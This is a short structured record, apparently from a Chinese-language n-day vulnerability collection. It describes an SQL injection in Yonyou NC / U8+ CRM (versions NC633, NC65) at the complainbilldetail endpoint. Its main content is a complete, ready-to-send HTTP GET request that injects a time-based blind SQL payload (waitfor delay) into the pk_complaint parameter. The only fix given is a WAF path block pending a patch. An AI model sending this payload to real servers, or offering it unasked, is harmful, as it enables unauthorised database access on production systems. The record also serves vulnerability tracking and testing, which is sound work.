vendor = "用友"
name = "用友NC U8+ CRM complainbilldetail SQL注入漏洞"
type = "SQL注入"
version = "NC633、NC65"
path = "/ebvp/advorappcoll/complainbilldetail"
detail = "GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:8'-- HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive"
fix = "WAF封禁路路径，等待发布补丁"
date = "0729"
label = "nday"
